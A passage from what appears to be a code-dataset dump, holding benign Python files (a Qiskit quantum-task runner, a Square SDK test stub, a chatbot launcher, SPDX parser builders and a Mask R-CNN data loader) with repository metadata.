import time import threading import traceback from queue import PriorityQueue from collections import defaultdict from qiskit import IBMQ, Aer, execute from qiskit.providers.ibmq import least_busy from qiskit.tools.monitor import backend_overview, job_monitor from core import app def log(task_id, message): app.logger.info(f'{message}') logs[task_id].append(message) from core.algorithms.egcd import egcd from core.algorithms.bernvaz import bernvaz from core.algorithms.grover import grover from core.algorithms.grover_sudoku import grover_sudoku TASK_WORKERS_COUNT = 2 runner_functions = {'egcd': egcd, 'bernvaz': bernvaz, 'grover': grover, 'grover_sudoku': grover_sudoku, } task_id = 0 task_queue = PriorityQueue() task_results_queue = PriorityQueue() tasks = {} logs = defaultdict(list) worker_active_flag = threading.Event() worker_active_flag.set() task_worker_threads = [] def start_task_worker_threads(): for i in range(TASK_WORKERS_COUNT): task_worker_thread = threading.Thread(target=task_worker, args=(task_queue, task_results_queue, worker_active_flag), daemon=True) task_worker_thread.start() task_worker_threads.append(task_worker_thread) app.logger.info(f'RUNNER task_worker_threads: {task_worker_threads}') def run_algorithm(algorithm_id, run_values): priority = 1 global task_id task_id += 1 new_task = (priority, task_id, algorithm_id, run_values) tasks[task_id] = {'algorithm_id': algorithm_id, 'run_values': run_values, 'status': 'Running'} task_queue.put(new_task) app.logger.info(f'RUNNER new_task: {new_task}') app.logger.info(f'RUNNER task_queue.qsize: {task_queue.qsize()}') app.logger.info(f'RUNNER task_id: {task_id}') return task_id def task_worker(task_queue, task_results_queue, worker_active_flag): app.logger.info(f'RUNNER task_worker started') while True: time.sleep(1) if worker_active_flag.is_set() and not task_queue.empty(): pop_task = task_queue.get() priority, task_id, algorithm_id, run_values = pop_task app.logger.info(f'RUNNER pop_task: {pop_task}') app.logger.info(f'RUNNER task_queue.qsize: {task_queue.qsize()}') try: result = task_runner(task_id, algorithm_id, run_values) except Exception as exception: error_message = traceback.format_exc() log(task_id, error_message) tasks[task_id]['status'] = 'Failed' else: task_results_queue.put((task_id, result)) tasks[task_id]['result'] = result tasks[task_id]['status'] = 'Done' log(task_id, f'Result: {result}') app.logger.info(f'task_results_queue.qsize: {task_results_queue.qsize()}') app.logger.info(f'len(tasks): {len(tasks)}') # app.logger.info(f'RUNNER task_worker_threads: {task_worker_threads}') def task_runner(task_id, algorithm_id, run_values_multidict): run_values = dict(run_values_multidict) run_values['task_id'] = task_id runner_function = runner_functions[algorithm_id] run_mode = run_values.get('run_mode') app.logger.info(f'RUNNER run_mode: {run_mode}') app.logger.info(f'RUNNER run_values: {run_values}') app.logger.info(f'RUNNER runner_function: {runner_function}') if run_mode == 'classic': return runner_function(run_values) else: circuit = runner_function(run_values) qubit_count = circuit.num_qubits if run_mode == 'simulator': backend = Aer.get_backend('qasm_simulator') elif run_mode == 'quantum_device': qiskit_token = app.config.get('QISKIT_TOKEN') IBMQ.save_account(qiskit_token) if not IBMQ.active_account(): IBMQ.load_account() provider = IBMQ.get_provider() log(task_id, f'RUNNER provider: {provider}') log(task_id, f'RUNNER provider.backends(): {provider.backends()}') backend = get_least_busy_backend(provider, qubit_count) log(task_id, f'RUNNER backend: {backend}') job = execute(circuit, backend=backend, shots=1024) job_monitor(job, interval=0.5) result = job.result() counts = result.get_counts() log(task_id, f'RUNNER counts:') [log(task_id, f'{state}: {count}') for state, count in sorted(counts.items())] return {'Counts:': counts} def get_least_busy_backend(provider, qubit_count): backend_filter = lambda backend: (not backend.configuration().simulator and backend.configuration().n_qubits >= qubit_count and backend.status().operational==True) least_busy_backend = least_busy(provider.backends(filters=backend_filter)) return least_busy_backend
28.553846
104
0.595546
import time import threading import traceback from queue import PriorityQueue from collections import defaultdict from qiskit import IBMQ, Aer, execute from qiskit.providers.ibmq import least_busy from qiskit.tools.monitor import backend_overview, job_monitor from core import app def log(task_id, message): app.logger.info(f'{message}') logs[task_id].append(message) from core.algorithms.egcd import egcd from core.algorithms.bernvaz import bernvaz from core.algorithms.grover import grover from core.algorithms.grover_sudoku import grover_sudoku TASK_WORKERS_COUNT = 2 runner_functions = {'egcd': egcd, 'bernvaz': bernvaz, 'grover': grover, 'grover_sudoku': grover_sudoku, } task_id = 0 task_queue = PriorityQueue() task_results_queue = PriorityQueue() tasks = {} logs = defaultdict(list) worker_active_flag = threading.Event() worker_active_flag.set() task_worker_threads = [] def start_task_worker_threads(): for i in range(TASK_WORKERS_COUNT): task_worker_thread = threading.Thread(target=task_worker, args=(task_queue, task_results_queue, worker_active_flag), daemon=True) task_worker_thread.start() task_worker_threads.append(task_worker_thread) app.logger.info(f'RUNNER task_worker_threads: {task_worker_threads}') def run_algorithm(algorithm_id, run_values): priority = 1 global task_id task_id += 1 new_task = (priority, task_id, algorithm_id, run_values) tasks[task_id] = {'algorithm_id': algorithm_id, 'run_values': run_values, 'status': 'Running'} task_queue.put(new_task) app.logger.info(f'RUNNER new_task: {new_task}') app.logger.info(f'RUNNER task_queue.qsize: {task_queue.qsize()}') app.logger.info(f'RUNNER task_id: {task_id}') return task_id def task_worker(task_queue, task_results_queue, worker_active_flag): app.logger.info(f'RUNNER task_worker started') while True: time.sleep(1) if worker_active_flag.is_set() and not task_queue.empty(): pop_task = task_queue.get() priority, task_id, algorithm_id, run_values = pop_task app.logger.info(f'RUNNER pop_task: {pop_task}') app.logger.info(f'RUNNER task_queue.qsize: {task_queue.qsize()}') try: result = task_runner(task_id, algorithm_id, run_values) except Exception as exception: error_message = traceback.format_exc() log(task_id, error_message) tasks[task_id]['status'] = 'Failed' else: task_results_queue.put((task_id, result)) tasks[task_id]['result'] = result tasks[task_id]['status'] = 'Done' log(task_id, f'Result: {result}') app.logger.info(f'task_results_queue.qsize: {task_results_queue.qsize()}') app.logger.info(f'len(tasks): {len(tasks)}') def task_runner(task_id, algorithm_id, run_values_multidict): run_values = dict(run_values_multidict) run_values['task_id'] = task_id runner_function = runner_functions[algorithm_id] run_mode = run_values.get('run_mode') app.logger.info(f'RUNNER run_mode: {run_mode}') app.logger.info(f'RUNNER run_values: {run_values}') app.logger.info(f'RUNNER runner_function: {runner_function}') if run_mode == 'classic': return runner_function(run_values) else: circuit = runner_function(run_values) qubit_count = circuit.num_qubits if run_mode == 'simulator': backend = Aer.get_backend('qasm_simulator') elif run_mode == 'quantum_device': qiskit_token = app.config.get('QISKIT_TOKEN') IBMQ.save_account(qiskit_token) if not IBMQ.active_account(): IBMQ.load_account() provider = IBMQ.get_provider() log(task_id, f'RUNNER provider: {provider}') log(task_id, f'RUNNER provider.backends(): {provider.backends()}') backend = get_least_busy_backend(provider, qubit_count) log(task_id, f'RUNNER backend: {backend}') job = execute(circuit, backend=backend, shots=1024) job_monitor(job, interval=0.5) result = job.result() counts = result.get_counts() log(task_id, f'RUNNER counts:') [log(task_id, f'{state}: {count}') for state, count in sorted(counts.items())] return {'Counts:': counts} def get_least_busy_backend(provider, qubit_count): backend_filter = lambda backend: (not backend.configuration().simulator and backend.configuration().n_qubits >= qubit_count and backend.status().operational==True) least_busy_backend = least_busy(provider.backends(filters=backend_filter)) return least_busy_backend
true
true
f728f8e6f71945d2a6718b12de9140b2ecfe37b3
1,294
py
Python
test/test_v1_apply_modifier_list_request.py
shaminmeerankutty/connect-python-sdk
524c8fe344bc3c0340833984970a07d519c4f5be
[ "Apache-2.0" ]
53
2016-08-06T17:12:16.000Z
2020-08-02T19:43:58.000Z
test/test_v1_apply_modifier_list_request.py
shaminmeerankutty/connect-python-sdk
524c8fe344bc3c0340833984970a07d519c4f5be
[ "Apache-2.0" ]
32
2016-08-19T16:32:30.000Z
2020-01-14T18:01:37.000Z
test/test_v1_apply_modifier_list_request.py
shaminmeerankutty/connect-python-sdk
524c8fe344bc3c0340833984970a07d519c4f5be
[ "Apache-2.0" ]
45
2016-09-05T11:58:09.000Z
2020-11-15T16:26:41.000Z
# coding: utf-8 """ Copyright 2017 Square, Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from __future__ import absolute_import import os import sys import unittest import squareconnect from squareconnect.rest import ApiException from squareconnect.models.v1_apply_modifier_list_request import V1ApplyModifierListRequest class TestV1ApplyModifierListRequest(unittest.TestCase): """ V1ApplyModifierListRequest unit test stubs """ def setUp(self): pass def tearDown(self): pass def testV1ApplyModifierListRequest(self): """ Test V1ApplyModifierListRequest """ model = squareconnect.models.v1_apply_modifier_list_request.V1ApplyModifierListRequest() if __name__ == '__main__': unittest.main()
26.408163
96
0.741113
from __future__ import absolute_import import os import sys import unittest import squareconnect from squareconnect.rest import ApiException from squareconnect.models.v1_apply_modifier_list_request import V1ApplyModifierListRequest class TestV1ApplyModifierListRequest(unittest.TestCase): def setUp(self): pass def tearDown(self): pass def testV1ApplyModifierListRequest(self): model = squareconnect.models.v1_apply_modifier_list_request.V1ApplyModifierListRequest() if __name__ == '__main__': unittest.main()
true
true
f728f995aa93d0b83b79a6116102e1dddf8f6ac2
503
py
Python
src/run.py
jessrenteria/flowbot
82d0c0022ab7c5f72a605cb36456b1ab52bdd2e4
[ "Apache-2.0" ]
null
null
null
src/run.py
jessrenteria/flowbot
82d0c0022ab7c5f72a605cb36456b1ab52bdd2e4
[ "Apache-2.0" ]
null
null
null
src/run.py
jessrenteria/flowbot
82d0c0022ab7c5f72a605cb36456b1ab52bdd2e4
[ "Apache-2.0" ]
null
null
null
import argparse from utils.config import get_config from model.flowbot import Flowbot def main(): parser = argparse.ArgumentParser() parser.add_argument('--train', action='store_true') parser.add_argument('--bot', default='lstm_attention') args = parser.parse_args() testing = not args.train config = get_config(args.bot) flowbot = Flowbot(config, testing) if testing: flowbot.interact() else: flowbot.train() if __name__=='__main__': main()
21.869565
58
0.677932
import argparse from utils.config import get_config from model.flowbot import Flowbot def main(): parser = argparse.ArgumentParser() parser.add_argument('--train', action='store_true') parser.add_argument('--bot', default='lstm_attention') args = parser.parse_args() testing = not args.train config = get_config(args.bot) flowbot = Flowbot(config, testing) if testing: flowbot.interact() else: flowbot.train() if __name__=='__main__': main()
true
true
f728fa580fac0b74f2b800beae5b806ad9d33649
8,708
py
Python
spdx/parsers/jsonyamlxmlbuilders.py
quaresmajose/tools-python
53c917a1a2491a373efa23e4ef8570b5e863fabc
[ "Apache-2.0" ]
74
2015-12-25T09:43:18.000Z
2022-03-30T00:23:30.000Z
spdx/parsers/jsonyamlxmlbuilders.py
quaresmajose/tools-python
53c917a1a2491a373efa23e4ef8570b5e863fabc
[ "Apache-2.0" ]
184
2016-11-23T15:57:16.000Z
2022-03-15T05:25:59.000Z
spdx/parsers/jsonyamlxmlbuilders.py
quaresmajose/tools-python
53c917a1a2491a373efa23e4ef8570b5e863fabc
[ "Apache-2.0" ]
98
2015-12-13T12:20:34.000Z
2022-03-18T15:28:35.000Z
# Copyright (c) Xavier Figueroa # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from spdx.parsers import rdfbuilders from spdx.parsers import tagvaluebuilders from spdx.parsers import validations from spdx.parsers.builderexceptions import SPDXValueError from spdx.parsers.builderexceptions import CardinalityError from spdx.parsers.builderexceptions import OrderError class CreationInfoBuilder(rdfbuilders.CreationInfoBuilder): def __init__(self): super(CreationInfoBuilder, self).__init__() class ExternalDocumentRefsBuilder(rdfbuilders.ExternalDocumentRefBuilder): def __init__(self): super(ExternalDocumentRefsBuilder, self).__init__() class EntityBuilder(rdfbuilders.EntityBuilder): def __init__(self): super(EntityBuilder, self).__init__() class SnippetBuilder(rdfbuilders.SnippetBuilder): def __init__(self): super(SnippetBuilder, self).__init__() class ReviewBuilder(rdfbuilders.ReviewBuilder): def __init__(self): super(ReviewBuilder, self).__init__() class PackageBuilder(rdfbuilders.PackageBuilder): def __init__(self): super(PackageBuilder, self).__init__() class DocBuilder(tagvaluebuilders.DocBuilder): def __init__(self): super(DocBuilder, self).__init__() def set_doc_spdx_id(self, doc, doc_spdx_id_line): """ Set the document SPDX Identifier. Raise SPDXValueError if malformed value, CardinalityError if already defined. """ if not self.doc_spdx_id_set: if ( doc_spdx_id_line == "SPDXRef-DOCUMENT" or validations.validate_doc_spdx_id(doc_spdx_id_line) ): doc.spdx_id = doc_spdx_id_line self.doc_spdx_id_set = True return True else: raise SPDXValueError("Document::SPDXID") else: raise CardinalityError("Document::SPDXID") def set_doc_comment(self, doc, comment): """ Set document comment. Raise CardinalityError if comment already set. """ if not self.doc_comment_set: self.doc_comment_set = True doc.comment = comment else: raise CardinalityError("Document::Comment") def set_doc_namespace(self, doc, namespace): """ Set the document namespace. Raise SPDXValueError if malformed value. Raise CardinalityError if already defined. """ if not self.doc_namespace_set: self.doc_namespace_set = True if validations.validate_doc_namespace(namespace): doc.namespace = namespace return True else: raise SPDXValueError("Document::Namespace") else: raise CardinalityError("Document::Comment") class LicenseBuilder(tagvaluebuilders.LicenseBuilder): def __init__(self): super(LicenseBuilder, self).__init__() def set_lic_name(self, doc, name): """ Set license name. Raise SPDXValueError if name is not str or utils.NoAssert Raise CardinalityError if it is already set Raise OrderError if no license id defined. """ if self.has_extr_lic(doc): if not self.extr_lic_name_set: self.extr_lic_name_set = True if validations.validate_extr_lic_name(name, True): self.extr_lic(doc).full_name = name return True else: raise SPDXValueError("ExtractedLicense::Name") else: raise CardinalityError("ExtractedLicense::Name") else: raise OrderError("ExtractedLicense::Name") def set_lic_text(self, doc, text): """ Set license name. Raise CardinalityError if it is already set. Raise OrderError if no license id defined. """ if self.has_extr_lic(doc): if not self.extr_text_set: self.extr_text_set = True self.extr_lic(doc).text = text return True else: raise CardinalityError("ExtractedLicense::text") else: raise OrderError("ExtractedLicense::text") def set_lic_comment(self, doc, comment): """ Set license comment. Raise CardinalityError if it is already set. Raise OrderError if no license ID defined. """ if self.has_extr_lic(doc): if not self.extr_lic_comment_set: self.extr_lic_comment_set = True self.extr_lic(doc).comment = comment return True else: raise CardinalityError("ExtractedLicense::comment") else: raise OrderError("ExtractedLicense::comment") class FileBuilder(rdfbuilders.FileBuilder): def __init__(self): super(FileBuilder, self).__init__() def set_file_notice(self, doc, text): """ Set file notice Raise OrderError if no package or file defined. Raise CardinalityError if more than one. """ if self.has_package(doc) and self.has_file(doc): self.file_notice_set = True self.file(doc).notice = text return True else: raise OrderError("File::Notice") def set_file_type(self, doc, type_value): """ Wrap rdfbuilders.FileBuilder.set_file_type to match the different fileType representations. """ type_dict = { "fileType_source": "SOURCE", "fileType_binary": "BINARY", "fileType_archive": "ARCHIVE", "fileType_other": "OTHER", } return super(FileBuilder, self).set_file_type(doc, type_dict.get(type_value)) class AnnotationBuilder(tagvaluebuilders.AnnotationBuilder): def __init__(self): super(AnnotationBuilder, self).__init__() def add_annotation_comment(self, doc, comment): """ Set the annotation comment. Raise CardinalityError if already set. Raise OrderError if no annotator defined before. """ if len(doc.annotations) != 0: if not self.annotation_comment_set: self.annotation_comment_set = True doc.annotations[-1].comment = comment return True else: raise CardinalityError("AnnotationComment") else: raise OrderError("AnnotationComment") class RelationshipBuilder(tagvaluebuilders.RelationshipBuilder): def __init__(self): super(RelationshipBuilder, self).__init__() def add_relationship_comment(self, doc, comment): """ Set the relationship comment. Raise CardinalityError if already set. Raise OrderError if no annotator defined before. """ if len(doc.relationships) != 0: if not self.relationship_comment_set: self.relationship_comment_set = True doc.relationships[-1].comment = comment return True else: raise CardinalityError("RelationshipComment") else: raise OrderError("RelationshipComment") class Builder( DocBuilder, CreationInfoBuilder, ExternalDocumentRefsBuilder, EntityBuilder, SnippetBuilder, ReviewBuilder, LicenseBuilder, FileBuilder, PackageBuilder, AnnotationBuilder, RelationshipBuilder, ): """ SPDX document builder. """ def __init__(self): super(Builder, self).__init__() # FIXME: this state does not make sense self.reset() def reset(self): """ Reset builder's state for building new documents. Must be called between usage with different documents. """ # FIXME: this state does not make sense self.reset_creation_info() self.reset_document() self.reset_package() self.reset_file_stat() self.reset_reviews() self.reset_annotations() self.reset_relationship() self.reset_extr_lics()
32.371747
85
0.629306
from spdx.parsers import rdfbuilders from spdx.parsers import tagvaluebuilders from spdx.parsers import validations from spdx.parsers.builderexceptions import SPDXValueError from spdx.parsers.builderexceptions import CardinalityError from spdx.parsers.builderexceptions import OrderError class CreationInfoBuilder(rdfbuilders.CreationInfoBuilder): def __init__(self): super(CreationInfoBuilder, self).__init__() class ExternalDocumentRefsBuilder(rdfbuilders.ExternalDocumentRefBuilder): def __init__(self): super(ExternalDocumentRefsBuilder, self).__init__() class EntityBuilder(rdfbuilders.EntityBuilder): def __init__(self): super(EntityBuilder, self).__init__() class SnippetBuilder(rdfbuilders.SnippetBuilder): def __init__(self): super(SnippetBuilder, self).__init__() class ReviewBuilder(rdfbuilders.ReviewBuilder): def __init__(self): super(ReviewBuilder, self).__init__() class PackageBuilder(rdfbuilders.PackageBuilder): def __init__(self): super(PackageBuilder, self).__init__() class DocBuilder(tagvaluebuilders.DocBuilder): def __init__(self): super(DocBuilder, self).__init__() def set_doc_spdx_id(self, doc, doc_spdx_id_line): if not self.doc_spdx_id_set: if ( doc_spdx_id_line == "SPDXRef-DOCUMENT" or validations.validate_doc_spdx_id(doc_spdx_id_line) ): doc.spdx_id = doc_spdx_id_line self.doc_spdx_id_set = True return True else: raise SPDXValueError("Document::SPDXID") else: raise CardinalityError("Document::SPDXID") def set_doc_comment(self, doc, comment): if not self.doc_comment_set: self.doc_comment_set = True doc.comment = comment else: raise CardinalityError("Document::Comment") def set_doc_namespace(self, doc, namespace): if not self.doc_namespace_set: self.doc_namespace_set = True if validations.validate_doc_namespace(namespace): doc.namespace = namespace return True else: raise SPDXValueError("Document::Namespace") else: raise CardinalityError("Document::Comment") class LicenseBuilder(tagvaluebuilders.LicenseBuilder): def __init__(self): super(LicenseBuilder, self).__init__() def set_lic_name(self, doc, name): if self.has_extr_lic(doc): if not self.extr_lic_name_set: self.extr_lic_name_set = True if validations.validate_extr_lic_name(name, True): self.extr_lic(doc).full_name = name return True else: raise SPDXValueError("ExtractedLicense::Name") else: raise CardinalityError("ExtractedLicense::Name") else: raise OrderError("ExtractedLicense::Name") def set_lic_text(self, doc, text): if self.has_extr_lic(doc): if not self.extr_text_set: self.extr_text_set = True self.extr_lic(doc).text = text return True else: raise CardinalityError("ExtractedLicense::text") else: raise OrderError("ExtractedLicense::text") def set_lic_comment(self, doc, comment): if self.has_extr_lic(doc): if not self.extr_lic_comment_set: self.extr_lic_comment_set = True self.extr_lic(doc).comment = comment return True else: raise CardinalityError("ExtractedLicense::comment") else: raise OrderError("ExtractedLicense::comment") class FileBuilder(rdfbuilders.FileBuilder): def __init__(self): super(FileBuilder, self).__init__() def set_file_notice(self, doc, text): if self.has_package(doc) and self.has_file(doc): self.file_notice_set = True self.file(doc).notice = text return True else: raise OrderError("File::Notice") def set_file_type(self, doc, type_value): type_dict = { "fileType_source": "SOURCE", "fileType_binary": "BINARY", "fileType_archive": "ARCHIVE", "fileType_other": "OTHER", } return super(FileBuilder, self).set_file_type(doc, type_dict.get(type_value)) class AnnotationBuilder(tagvaluebuilders.AnnotationBuilder): def __init__(self): super(AnnotationBuilder, self).__init__() def add_annotation_comment(self, doc, comment): if len(doc.annotations) != 0: if not self.annotation_comment_set: self.annotation_comment_set = True doc.annotations[-1].comment = comment return True else: raise CardinalityError("AnnotationComment") else: raise OrderError("AnnotationComment") class RelationshipBuilder(tagvaluebuilders.RelationshipBuilder): def __init__(self): super(RelationshipBuilder, self).__init__() def add_relationship_comment(self, doc, comment): if len(doc.relationships) != 0: if not self.relationship_comment_set: self.relationship_comment_set = True doc.relationships[-1].comment = comment return True else: raise CardinalityError("RelationshipComment") else: raise OrderError("RelationshipComment") class Builder( DocBuilder, CreationInfoBuilder, ExternalDocumentRefsBuilder, EntityBuilder, SnippetBuilder, ReviewBuilder, LicenseBuilder, FileBuilder, PackageBuilder, AnnotationBuilder, RelationshipBuilder, ): def __init__(self): super(Builder, self).__init__() self.reset() def reset(self): self.reset_creation_info() self.reset_document() self.reset_package() self.reset_file_stat() self.reset_reviews() self.reset_annotations() self.reset_relationship() self.reset_extr_lics()
true
true
f728faab3d96a9b5edcb73fb2f1bcacba109faf4
6,750
py
Python
maskrcnn/data/build.py
kSahatova/MULAN-XAI
7f2ede7cc8ad4e772a3cfe7d52f0a710d5c89d5a
[ "MIT" ]
6
2020-08-31T03:15:02.000Z
2021-12-14T02:33:51.000Z
maskrcnn/data/build.py
kSahatova/MULAN-XAI
7f2ede7cc8ad4e772a3cfe7d52f0a710d5c89d5a
[ "MIT" ]
1
2021-12-15T06:43:59.000Z
2021-12-15T06:45:50.000Z
maskrcnn/data/build.py
kSahatova/MULAN-XAI
7f2ede7cc8ad4e772a3cfe7d52f0a710d5c89d5a
[ "MIT" ]
5
2019-11-26T14:19:36.000Z
2021-11-22T13:49:01.000Z
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved. import bisect import copy import logging import torch.utils.data from maskrcnn.utils.comm import get_world_size from maskrcnn.utils.imports import import_file from . import datasets as D from . import samplers from .collate_batch import BatchCollator, Batch3dceCollator from .transforms import build_transforms from maskrcnn.config import cfg def build_dataset(dataset_list, transforms, dataset_catalog, is_train=True): """ Arguments: dataset_list (list[str]): Contains the names of the datasets, i.e., coco_2014_trian, coco_2014_val, etc transforms (callable): transforms to apply to each (image, target) sample dataset_catalog (DatasetCatalog): contains the information on how to construct a dataset. is_train (bool): whether to setup the dataset for training or testing """ if not isinstance(dataset_list, (list, tuple)): raise RuntimeError( "dataset_list should be a list of strings, got {}".format(dataset_list) ) datasets = [] for dataset_name in dataset_list: data = dataset_catalog.get(dataset_name) factory = getattr(D, data["factory"]) args = data["args"] # for COCODataset, we want to remove images without annotations # during training if data["factory"] == "COCODataset": args["remove_images_without_annotations"] = is_train if data["factory"] == "PascalVOCDataset": args["use_difficult"] = not is_train args["transforms"] = transforms # make dataset from factory dataset = factory(**args) datasets.append(dataset) # for testing, return a list of datasets if not is_train: return datasets # for training, concatenate all datasets into a single one dataset = datasets[0] if len(datasets) > 1: dataset = D.ConcatDataset(datasets) return [dataset] def make_data_sampler(dataset, shuffle, distributed): if distributed: return samplers.DistributedSampler(dataset, shuffle=shuffle) if shuffle: sampler = torch.utils.data.sampler.RandomSampler(dataset) else: sampler = torch.utils.data.sampler.SequentialSampler(dataset) return sampler def _quantize(x, bins): bins = copy.copy(bins) bins = sorted(bins) quantized = list(map(lambda y: bisect.bisect_right(bins, y), x)) return quantized def _compute_aspect_ratios(dataset): aspect_ratios = [] for i in range(len(dataset)): img_info = dataset.get_img_info(i) aspect_ratio = float(img_info["height"]) / float(img_info["width"]) aspect_ratios.append(aspect_ratio) return aspect_ratios def make_batch_data_sampler( dataset, sampler, aspect_grouping, images_per_batch, num_iters=None, start_iter=0 ): if aspect_grouping: if not isinstance(aspect_grouping, (list, tuple)): aspect_grouping = [aspect_grouping] aspect_ratios = _compute_aspect_ratios(dataset) group_ids = _quantize(aspect_ratios, aspect_grouping) batch_sampler = samplers.GroupedBatchSampler( sampler, group_ids, images_per_batch, drop_uneven=False ) else: batch_sampler = torch.utils.data.sampler.BatchSampler( sampler, images_per_batch, drop_last=cfg.DATALOADER.DROP_LAST_BATCH, ) if num_iters is not None: batch_sampler = samplers.IterationBasedBatchSampler( batch_sampler, num_iters, start_iter ) return batch_sampler def make_datasets(split): is_train = split == 'train' paths_catalog = import_file( "maskrcnn.config.paths_catalog", cfg.PATHS_CATALOG, True ) DatasetCatalog = paths_catalog.DatasetCatalog # dataset_list = cfg.DATASETS.TRAIN if is_train else cfg.DATASETS.TEST dataset_list = eval('cfg.DATASETS.' + split.upper()) transforms = build_transforms(is_train) datasets = build_dataset(dataset_list, transforms, DatasetCatalog, is_train) return datasets def make_data_loader(datasets, is_train=True, is_distributed=False): num_gpus = get_world_size() if is_train: images_per_batch = cfg.SOLVER.IMS_PER_BATCH assert ( images_per_batch % num_gpus == 0 ), "SOLVER.IMS_PER_BATCH ({}) must be divisible by the number " "of GPUs ({}) used.".format(images_per_batch, num_gpus) images_per_gpu = images_per_batch // num_gpus shuffle = True else: images_per_batch = cfg.TEST.IMS_PER_BATCH assert ( images_per_batch % num_gpus == 0 ), "TEST.IMS_PER_BATCH ({}) must be divisible by the number " "of GPUs ({}) used.".format(images_per_batch, num_gpus) images_per_gpu = images_per_batch // num_gpus shuffle = cfg.TEST.SHUFFLE # if images_per_gpu > 1: # logger = logging.getLogger(__name__) # logger.warning( # "When using more than one image per GPU you may encounter " # "an out-of-memory (OOM) error if your GPU does not have " # "sufficient memory. If this happens, you can reduce " # "SOLVER.IMS_PER_BATCH (for training) or " # "TEST.IMS_PER_BATCH (for inference). For training, you must " # "also adjust the learning rate and schedule length according " # "to the linear scaling rule. See for example: " # "https://github.com/facebookresearch/Detectron/blob/master/configs/getting_started/tutorial_1gpu_e2e_faster_rcnn_R-50-FPN.yaml#L14" # ) # group images which have similar aspect ratio. In this case, we only # group in two cases: those with width / height > 1, and the other way around, # but the code supports more general grouping strategy aspect_grouping = [1] if cfg.DATALOADER.ASPECT_RATIO_GROUPING else [] data_loaders = [] for dataset in datasets: sampler = make_data_sampler(dataset, shuffle, is_distributed) batch_sampler = make_batch_data_sampler( dataset, sampler, aspect_grouping, images_per_gpu#, num_iters, start_iter ) collator = Batch3dceCollator(cfg.DATALOADER.SIZE_DIVISIBILITY) num_workers = cfg.DATALOADER.NUM_WORKERS data_loader = torch.utils.data.DataLoader( dataset, num_workers=num_workers, batch_sampler=batch_sampler, collate_fn=collator, ) data_loaders.append(data_loader) if is_train: # during training, a single (possibly concatenated) data_loader is returned assert len(data_loaders) == 1 return data_loaders[0] return data_loaders
37.709497
145
0.676593
import bisect import copy import logging import torch.utils.data from maskrcnn.utils.comm import get_world_size from maskrcnn.utils.imports import import_file from . import datasets as D from . import samplers from .collate_batch import BatchCollator, Batch3dceCollator from .transforms import build_transforms from maskrcnn.config import cfg def build_dataset(dataset_list, transforms, dataset_catalog, is_train=True): if not isinstance(dataset_list, (list, tuple)): raise RuntimeError( "dataset_list should be a list of strings, got {}".format(dataset_list) ) datasets = [] for dataset_name in dataset_list: data = dataset_catalog.get(dataset_name) factory = getattr(D, data["factory"]) args = data["args"] if data["factory"] == "COCODataset": args["remove_images_without_annotations"] = is_train if data["factory"] == "PascalVOCDataset": args["use_difficult"] = not is_train args["transforms"] = transforms dataset = factory(**args) datasets.append(dataset) if not is_train: return datasets dataset = datasets[0] if len(datasets) > 1: dataset = D.ConcatDataset(datasets) return [dataset] def make_data_sampler(dataset, shuffle, distributed): if distributed: return samplers.DistributedSampler(dataset, shuffle=shuffle) if shuffle: sampler = torch.utils.data.sampler.RandomSampler(dataset) else: sampler = torch.utils.data.sampler.SequentialSampler(dataset) return sampler def _quantize(x, bins): bins = copy.copy(bins) bins = sorted(bins) quantized = list(map(lambda y: bisect.bisect_right(bins, y), x)) return quantized def _compute_aspect_ratios(dataset): aspect_ratios = [] for i in range(len(dataset)): img_info = dataset.get_img_info(i) aspect_ratio = float(img_info["height"]) / float(img_info["width"]) aspect_ratios.append(aspect_ratio) return aspect_ratios def make_batch_data_sampler( dataset, sampler, aspect_grouping, images_per_batch, num_iters=None, start_iter=0 ): if aspect_grouping: if not isinstance(aspect_grouping, (list, tuple)): aspect_grouping = [aspect_grouping] aspect_ratios = _compute_aspect_ratios(dataset) group_ids = _quantize(aspect_ratios, aspect_grouping) batch_sampler = samplers.GroupedBatchSampler( sampler, group_ids, images_per_batch, drop_uneven=False ) else: batch_sampler = torch.utils.data.sampler.BatchSampler( sampler, images_per_batch, drop_last=cfg.DATALOADER.DROP_LAST_BATCH, ) if num_iters is not None: batch_sampler = samplers.IterationBasedBatchSampler( batch_sampler, num_iters, start_iter ) return batch_sampler def make_datasets(split): is_train = split == 'train' paths_catalog = import_file( "maskrcnn.config.paths_catalog", cfg.PATHS_CATALOG, True ) DatasetCatalog = paths_catalog.DatasetCatalog dataset_list = eval('cfg.DATASETS.' + split.upper()) transforms = build_transforms(is_train) datasets = build_dataset(dataset_list, transforms, DatasetCatalog, is_train) return datasets def make_data_loader(datasets, is_train=True, is_distributed=False): num_gpus = get_world_size() if is_train: images_per_batch = cfg.SOLVER.IMS_PER_BATCH assert ( images_per_batch % num_gpus == 0 ), "SOLVER.IMS_PER_BATCH ({}) must be divisible by the number " "of GPUs ({}) used.".format(images_per_batch, num_gpus) images_per_gpu = images_per_batch // num_gpus shuffle = True else: images_per_batch = cfg.TEST.IMS_PER_BATCH assert ( images_per_batch % num_gpus == 0 ), "TEST.IMS_PER_BATCH ({}) must be divisible by the number " "of GPUs ({}) used.".format(images_per_batch, num_gpus) images_per_gpu = images_per_batch // num_gpus shuffle = cfg.TEST.SHUFFLE aspect_grouping = [1] if cfg.DATALOADER.ASPECT_RATIO_GROUPING else [] data_loaders = [] for dataset in datasets: sampler = make_data_sampler(dataset, shuffle, is_distributed) batch_sampler = make_batch_data_sampler( dataset, sampler, aspect_grouping, images_per_gpu ) collator = Batch3dceCollator(cfg.DATALOADER.SIZE_DIVISIBILITY) num_workers = cfg.DATALOADER.NUM_WORKERS data_loader = torch.utils.data.DataLoader( dataset, num_workers=num_workers, batch_sampler=batch_sampler, collate_fn=collator, ) data_loaders.append(data_loader) if is_train: assert len(data_loaders) == 1 return data_loaders[0] return data_loaders
true
true
f728fabd5cf2294bd0939b31fe35c4680ca09bf4
1,088
py
